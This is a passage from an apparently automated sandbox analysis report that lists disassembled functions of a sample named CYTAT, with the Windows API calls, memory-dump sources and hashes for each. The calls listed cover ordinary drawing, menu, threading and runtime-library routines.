                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                • String ID:
                                                • API String ID: 3691411573-0
                                                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                • EndPath.GDI32(?), ref: 004472D6
                                                • StrokePath.GDI32(?), ref: 004472E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                • String ID:
                                                • API String ID: 372113273-0
                                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __getptd.LIBCMT ref: 0041708E
                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                • __lock.LIBCMT ref: 004170BE
                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                • _free.LIBCMT ref: 004170EE
                                                • InterlockedIncrement.KERNEL32(009E2DB0), ref: 00417106
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 3470314060-0
                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                • ExitThread.KERNEL32 ref: 004151ED
                                                • __freefls@4.LIBCMT ref: 00415209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                • String ID:
                                                • API String ID: 442100245-0
                                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                • _wcslen.LIBCMT ref: 0045F94A
                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                • String ID: 0
                                                • API String ID: 621800784-4108050209
                                                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                • String ID: \VH
                                                • API String ID: 3884216118-234962358
                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                • IsMenu.USER32(?), ref: 0044854D
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                • DrawMenuBar.USER32 ref: 004485AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert
                                                • String ID: 0
                                                • API String ID: 3076010158-4108050209
                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1589278365-1403004172
                                                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Handle
                                                • String ID: nul
                                                • API String ID: 2519475695-2873401336
                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Handle
                                                • String ID: nul
                                                • API String ID: 2519475695-2873401336
                                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SysAnimate32
                                                • API String ID: 0-1011021900
                                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
